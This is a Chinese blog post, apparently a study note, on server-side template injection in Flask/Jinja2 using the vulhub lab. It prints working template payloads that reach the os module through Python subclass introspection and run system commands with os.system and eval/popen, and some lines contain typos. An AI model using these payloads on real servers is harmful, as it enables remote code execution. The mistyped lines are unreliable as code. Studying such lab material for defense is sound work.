最近在研究2017年的相关漏洞,找到了一个python写的框架flask的服务端模板注入漏洞。
首先搭建一个flask环境。
在github上下一个docker https://github.com/vulhub/vulhub/tree/master/flask/ssti
然后运行docker
先来看一下代码:
由此,在浏览器中输入http://your-ip/?name=leaf
会出现 hello leaf
但在name后面也可以输入其他东西,比如:
http://your-ip/?name={{1*1}}
出现 hello 1
http://your-ip/?name={{'aaa'.upper()}}
会出现hello AAA
由此就有大神找出了任意命令执行的方法了。
在python里要执行系统命令需要import os模块。
想要在模板中直接调用内置模块 os,即需要在模板环境中对其注册
需要在上面的代码里加一句:
t.globals['os'] =os
如果没有加这一句,直接使用os中的方法会报错。
那么,如何在未注册 os 模块的情况下执行系统命令呢?这就用到之前研究的各种下划线函数了。
先看下面的代码:
由此可以访问到很多其他模块,os模块自然也可以这样访问到。
查阅的其他资料,访问os模块都是从warnings.catch_warnings模块入手的。看一下catch_warnings在哪个位置,代码如下:
import warnings
[].__class__.base__.__subclasses__().index(warnings.catch_warnings)
得到的结果是59
知道了位置后,再用func_global看看该模块有哪些global函数
这里能看到linecache,我们要访问的os模块就在这里,看看这个模块的各种属性(代码如下):
[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__
就能看到os模块了(图片太大,不贴了)。
既然找到了os,接下来就是使用它了。
现在看看怎么在Jinja2中直接构造命令执行代码,我对Jinja2还不算很熟悉,这里先放上两段大神的代码:
{%for c in[].__class__.__base__.__subclasses__()%}
{%if c.__name__ =='catch_warnings'%}{{c.__init__.func_globals['linecache'].__dict__['os'].system('id') }}
{% end if%}
{% end for%}
当然也可以用eval函数,代码如下:
{%for c in[].__class__.__base__.__subclasses__() %}
{%if c.__name__ == 'catch_warnings' %}
{%for b in c.__init__.__globals__.values() %}
{%if b.__class__ == {}.__class__ %}
{%if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{%end if%}
{%end if%}
{%end for%}
{%end if%}
{%end for%}
最后放到浏览器里注意进行url编码,就可以使用flask模板进行命令执行了
参考:https://github.com/vulhub/vulhub/tree/master/flask/ssti
http://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates
mark down不会用,怎么改成有代码有引用的格式??